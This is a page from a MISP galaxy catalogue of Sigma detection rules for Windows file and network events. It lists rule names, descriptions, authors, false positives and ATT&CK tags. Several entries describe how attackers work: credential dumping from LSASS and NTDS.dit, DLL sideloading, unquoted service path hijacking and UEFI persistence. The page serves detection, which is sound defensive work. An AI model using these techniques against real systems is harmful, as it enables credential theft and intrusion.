tags ['attack.exfiltration', 'attack.t1567.001']
Related clusters

To see the related clusters, click here.

Potential Dead Drop Resolvers

Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.

Internal MISP references

UUID 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7 which can be used as unique global reference for Potential Dead Drop Resolvers in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sorina Ionescu, X__Junior (Nextron Systems)
creation_date 2022/08/17
falsepositive ["One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender.", 'Ninite contacting githubusercontent.com']
filename net_connection_win_susp_dead_drop_resolvers.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102', 'attack.t1102.001']
Related clusters

To see the related clusters, click here.

Microsoft Binary Suspicious Communication Endpoint

Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.

Internal MISP references

UUID e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97 which can be used as unique global reference for Microsoft Binary Suspicious Communication Endpoint in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2018/08/30
falsepositive ['Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule.']
filename net_connection_win_susp_file_sharing_domains_susp_folders.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potential Privilege Escalation Attempt Via .Exe.Local Technique

Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"

Internal MISP references

UUID 07a99744-56ac-40d2-97b7-2095967b0e03 which can be used as unique global reference for Potential Privilege Escalation Attempt Via .Exe.Local Technique in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
creation_date 2022/12/16
falsepositive ['Unknown']
filename file_event_win_system32_local_folder_privilege_escalation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation']

Self Extraction Directive File Created In Potentially Suspicious Location

Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.

Internal MISP references

UUID 760e75d8-c3b5-409b-a9bf-6130b4c4603f which can be used as unique global reference for Self Extraction Directive File Created In Potentially Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024/02/05
falsepositive ['Unknown']
filename file_event_win_sed_file_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

LSASS Process Memory Dump Files

Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.

Internal MISP references

UUID a5a2d357-1ab8-4675-a967-ef9990a59391 which can be used as unique global reference for LSASS Process Memory Dump Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/15
falsepositive ['Unknown']
filename file_event_win_lsass_default_dump_file_names.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

VHD Image Download Via Browser

Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.

Internal MISP references

UUID 8468111a-ef07-4654-903b-b863a80bbc95 which can be used as unique global reference for VHD Image Download Via Browser in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
creation_date 2021/10/25
falsepositive ['Legitimate downloads of ".vhd" files would also trigger this']
filename file_event_win_vhd_download_via_browsers.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001']
Related clusters

To see the related clusters, click here.

LiveKD Driver Creation By Uncommon Process

Detects the creation of the LiveKD driver by a process image other than "livekd.exe".

Internal MISP references

UUID 059c5af9-5131-4d8d-92b2-de4ad6146712 which can be used as unique global reference for LiveKD Driver Creation By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/16
falsepositive ['Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter']
filename file_event_win_sysinternals_livekd_driver_susp_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

NTDS.DIT Creation By Uncommon Process

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory

Internal MISP references

UUID 11b1ed55-154d-4e82-8ad7-83739298f720 which can be used as unique global reference for NTDS.DIT Creation By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/11
falsepositive ['Unknown']
filename file_event_win_ntds_dit_uncommon_process.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Typical HiveNightmare SAM File Export

Detects files written by the different tools that exploit HiveNightmare

Internal MISP references

UUID 6ea858a8-ba71-4a12-b2cc-5d83312404c7 which can be used as unique global reference for Typical HiveNightmare SAM File Export in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/23
falsepositive ['Files that accidentally contain these strings']
filename file_event_win_hktl_hivenightmare_file_exports.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.001', 'cve.2021.36934']
Related clusters

To see the related clusters, click here.

PowerShell Module File Created

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.

Internal MISP references

UUID e36941d0-c0f0-443f-bc6f-cb2952eb69ea which can be used as unique global reference for PowerShell Module File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/09
falsepositive ['Likely']
filename file_event_win_powershell_module_creation.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Suspicious Outlook Macro Created

Detects the creation of a macro file for Outlook.

Internal MISP references

UUID 117d3d3a-755c-4a61-b23e-9171146d094c which can be used as unique global reference for Suspicious Outlook Macro Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Unlikely']
filename file_event_win_office_outlook_susp_macro_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

Suspicious LNK Double Extension File Created

Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.

Internal MISP references

UUID 3215aa19-f060-4332-86d5-5602511f3ca8 which can be used as unique global reference for Suspicious LNK Double Extension File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022/11/07
falsepositive ['Some tuning is required for other general purpose directories of third party apps']
filename file_event_win_susp_lnk_double_extension.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.007']
Related clusters

To see the related clusters, click here.

Suspicious Creation TXT File in User Desktop

Ransomware create txt file in the user Desktop

Internal MISP references

UUID caf02a0a-1e1c-4552-9b48-5e070bd88d11 which can be used as unique global reference for Suspicious Creation TXT File in User Desktop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/26
falsepositive ['Unknown']
filename file_event_win_susp_desktop_txt.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

NPPSpy Hacktool Usage

Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file

Internal MISP references

UUID cad1fe90-2406-44dc-bd03-59d0b58fe722 which can be used as unique global reference for NPPSpy Hacktool Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/29
falsepositive ['Unknown']
filename file_event_win_hktl_nppspy.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access']

Creation of a Diagcab

Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)

Internal MISP references

UUID 3d0ed417-3d94-4963-a562-4a92c940656a which can be used as unique global reference for Creation of a Diagcab in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/06/08
falsepositive ['Legitimate microsoft diagcab']
filename file_event_win_susp_diagcab.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.resource_development']

VsCode Powershell Profile Modification

Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence

Internal MISP references

UUID 3a9fa2ec-30bc-4ebd-b49e-7c9cff225502 which can be used as unique global reference for VsCode Powershell Profile Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Legitimate use of the profile by developers or administrators']
filename file_event_win_susp_vscode_powershell_profile.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.013']
Related clusters

To see the related clusters, click here.

Suspicious PROCEXP152.sys File Created In TMP

Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.

Internal MISP references

UUID 3da70954-0f2c-4103-adff-b7440368f50e which can be used as unique global reference for Suspicious PROCEXP152.sys File Created In TMP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow (@xknow_infosec), xorxes (@xor_xes)
creation_date 2019/04/08
falsepositive ["Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it."]
filename file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1562.001', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

OneNote Attachment File Dropped In Suspicious Location

Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments

Internal MISP references

UUID 7fd164ba-126a-4d9c-9392-0d4f7c243df0 which can be used as unique global reference for OneNote Attachment File Dropped In Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/22
falsepositive ['Legitimate usage of ".one" or ".onepkg" files from those locations']
filename file_event_win_office_onenote_files_in_susp_locations.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

Suspicious File Created Via OneNote Application

Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild

Internal MISP references

UUID fcc6d700-68d9-4241-9a1a-06874d621b06 which can be used as unique global reference for Suspicious File Created Via OneNote Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/09
falsepositive ["False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", 'Occasional FPs might occur if OneNote is used internally to share different embedded documents']
filename file_event_win_office_onenote_susp_dropped_files.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

NTDS.DIT Creation By Uncommon Parent Process

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory

Internal MISP references

UUID 4e7050dd-e548-483f-b7d6-527ab4fa784d which can be used as unique global reference for NTDS.DIT Creation By Uncommon Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/11
falsepositive ['Unknown']
filename file_event_win_ntds_dit_uncommon_parent_process.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

ADSI-Cache File Creation By Uncommon Tool

Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.

Internal MISP references

UUID 75bf09fa-1dd7-4d18-9af9-dd9e492562eb which can be used as unique global reference for ADSI-Cache File Creation By Uncommon Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow @xknow_infosec, Tim Shelton
creation_date 2019/03/24
falsepositive ['Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.']
filename file_event_win_adsi_cache_creation_by_uncommon_tool.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1001.003', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

PSEXEC Remote Execution File Artefact

Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system

Internal MISP references

UUID 304afd73-55a5-4bb9-8c21-0b1fc84ea9e4 which can be used as unique global reference for PSEXEC Remote Execution File Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/21
falsepositive ['Unlikely']
filename file_event_win_sysinternals_psexec_service_key.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.execution', 'attack.persistence', 'attack.t1136.002', 'attack.t1543.003', 'attack.t1570', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Suspicious File Creation In Uncommon AppData Folder

Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs

Internal MISP references

UUID d7b50671-d1ad-4871-aa60-5aa5b331fe04 which can be used as unique global reference for Suspicious File Creation In Uncommon AppData Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Unlikely']
filename file_event_win_new_files_in_uncommon_appdata_folder.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

Suspicious Double Extension Files

Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.

Internal MISP references

UUID b4926b47-a9d7-434c-b3a0-adc3fa0bd13e which can be used as unique global reference for Suspicious Double Extension Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022/06/19
falsepositive ['Unlikely']
filename file_event_win_susp_double_extension.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.007']
Related clusters

To see the related clusters, click here.

Suspicious Files in Default GPO Folder

Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder

Internal MISP references

UUID 5f87308a-0a5b-4623-ae15-d8fa1809bc60 which can be used as unique global reference for Suspicious Files in Default GPO Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022/04/28
falsepositive ['Unknown']
filename file_event_win_susp_default_gpo_dir_write.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1036.005', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Process Explorer Driver Creation By Non-Sysinternals Binary

Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.

Internal MISP references

UUID de46c52b-0bf8-4936-a327-aace94f94ac6 which can be used as unique global reference for Process Explorer Driver Creation By Non-Sysinternals Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Some false positives may occur with legitimate renamed process explorer binaries']
filename file_event_win_sysinternals_procexp_driver_susp_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Creation Exe for Service with Unquoted Path

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.

Internal MISP references

UUID 8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9 which can be used as unique global reference for Creation Exe for Service with Unquoted Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Unknown']
filename file_event_win_creation_unquoted_service_path.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.009']
Related clusters

To see the related clusters, click here.

GoToAssist Temporary Installation Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 5d756aee-ad3e-4306-ad95-cb1abec48de2 which can be used as unique global reference for GoToAssist Temporary Installation Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename file_event_win_gotoopener_artefact.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Potential Remote Credential Dumping Activity

Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.

Internal MISP references

UUID 6e2a900a-ced9-4e4a-a9c2-13e706f9518a which can be used as unique global reference for Potential Remote Credential Dumping Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author SecurityAura
creation_date 2022/11/16
falsepositive ['Unknown']
filename file_event_win_hktl_remote_cred_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Windows Shell/Scripting Application File Write to Suspicious Folder

Detects Windows shells and scripting applications that write files to suspicious folders

Internal MISP references

UUID 1277f594-a7d1-4f28-a2d3-73af5cbeab43 which can be used as unique global reference for Windows Shell/Scripting Application File Write to Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/20
falsepositive ['Unknown']
filename file_event_win_shell_write_susp_directory.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

WScript or CScript Dropper - File

Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe

Internal MISP references

UUID 002bdb95-0cf1-46a6-9e08-d38c128a6127 which can be used as unique global reference for WScript or CScript Dropper - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton
creation_date 2022/01/10
falsepositive ['Unknown']
filename file_event_win_cscript_wscript_dropper.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Microsoft Office Add-In

Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).

Internal MISP references

UUID 8e1cb247-6cf6-42fa-b440-3f27d57e9936 which can be used as unique global reference for Potential Persistence Via Microsoft Office Add-In in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/05/11
falsepositive ['Legitimate add-ins']
filename file_event_win_office_addin_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137.006']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Temporary File

Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.

Internal MISP references

UUID 0afecb6e-6223-4a82-99fb-bf5b981e92a5 which can be used as unique global reference for Remote Access Tool - ScreenConnect Temporary File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2023/10/10
falsepositive ['Legitimate use of ScreenConnect']
filename file_event_win_remote_access_tools_screenconnect_remote_file.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Legitimate Application Dropped Script

Detects programs on a Windows system that should not write scripts to disk

Internal MISP references

UUID 7d604714-e071-49ff-8726-edeb95a70679 which can be used as unique global reference for Legitimate Application Dropped Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/08/21
falsepositive ['Unknown']
filename file_event_win_susp_legitimate_app_dropping_script.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Uncommon File Created In Office Startup Folder

Detects the creation of a file with an uncommon extension in an Office application startup folder

Internal MISP references

UUID a10a2c40-2c4d-49f8-b557-1a946bc55d9d which can be used as unique global reference for Uncommon File Created In Office Startup Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/05
falsepositive ['False positive might stem from rare extensions used by other Office utilities.']
filename file_event_win_office_uncommon_file_startup.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001']
Related clusters

To see the related clusters, click here.

WinSxS Executable File Creation By Non-System Process

Detects the creation of binaries in the WinSxS folder by non-system processes

Internal MISP references

UUID 34746e8c-5fb8-415a-b135-0abc167e912a which can be used as unique global reference for WinSxS Executable File Creation By Non-System Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/11
falsepositive ['Unknown']
filename file_event_win_susp_winsxs_binary_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution']

Potentially Suspicious DMP/HDMP File Creation

Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.

Internal MISP references

UUID aba15bdd-657f-422a-bab3-ac2d2a0d6f1c which can be used as unique global reference for Potentially Suspicious DMP/HDMP File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/07
falsepositive ['Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.']
filename file_event_win_dump_file_susp_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Executable File Creation

Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.

Internal MISP references

UUID 74babdd6-a758-4549-9632-26535279e654 which can be used as unique global reference for Suspicious Executable File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/05
falsepositive ['Unknown']
filename file_event_win_susp_executable_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564']
Related clusters

To see the related clusters, click here.

Potential Homoglyph Attack Using Lookalike Characters in Filename

Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.

Internal MISP references

UUID 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6 which can be used as unique global reference for Potential Homoglyph Attack Using Lookalike Characters in Filename in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski, @micahbabinski
creation_date 2023/05/08
falsepositive ['File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.']
filename file_event_win_susp_homoglyph_filename.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

GatherNetworkInfo.VBS Reconnaissance Script Output

Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".

Internal MISP references

UUID f92a6f1e-a512-4a15-9735-da09e78d7273 which can be used as unique global reference for GatherNetworkInfo.VBS Reconnaissance Script Output in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Unknown']
filename file_event_win_lolbin_gather_network_info_script_output.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.discovery']

LiveKD Kernel Memory Dump File Created

Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.

Internal MISP references

UUID 814ddeca-3d31-4265-8e07-8cc54fb44903 which can be used as unique global reference for LiveKD Kernel Memory Dump File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/16
falsepositive ['In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.']
filename file_event_win_sysinternals_livekd_default_dump_name.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

Visual Studio Code Tunnel Remote File Creation

Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature

Internal MISP references

UUID 56e05d41-ce99-4ecd-912d-93f019ee0b71 which can be used as unique global reference for Visual Studio Code Tunnel Remote File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/25
falsepositive ['Unknown']
filename file_event_win_vscode_tunnel_remote_creation_artefacts.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control']

Potential Persistence Via Outlook Form

Detects the creation of a new Outlook form which can contain malicious code

Internal MISP references

UUID c3edc6a5-d9d4-48d8-930e-aab518390917 which can be used as unique global reference for Potential Persistence Via Outlook Form in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/10
falsepositive ['Legitimate use of outlook forms']
filename file_event_win_office_outlook_newform.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137.003']
Related clusters

To see the related clusters, click here.

Malicious DLL File Dropped in the Teams or OneDrive Folder

Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded

Internal MISP references

UUID 1908fcc1-1b92-4272-8214-0fbaf2fa5163 which can be used as unique global reference for Malicious DLL File Dropped in the Teams or OneDrive Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/12
falsepositive ['Unknown']
filename file_event_win_iphlpapi_dll_sideloading.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

UEFI Persistence Via Wpbbin - FileCreation

Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method

Internal MISP references

UUID e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f which can be used as unique global reference for UEFI Persistence Via Wpbbin - FileCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/18
falsepositive ['Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)']
filename file_event_win_wpbbin_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1542.001']
Related clusters

To see the related clusters, click here.

TeamViewer Remote Session

Detects the creation of log files during a TeamViewer remote session

Internal MISP references

UUID 162ab1e4-6874-4564-853c-53ec3ab8be01 which can be used as unique global reference for TeamViewer Remote Session in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/30
falsepositive ['Legitimate uses of TeamViewer in an organisation']
filename file_event_win_susp_teamviewer_remote_session.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

BloodHound Collection Files

Detects default file names outputted by the BloodHound collection tool SharpHound

Internal MISP references

UUID 02773bed-83bf-469f-b7ff-e676e7d78bab which can be used as unique global reference for BloodHound Collection Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author C.J. May
creation_date 2022/08/09
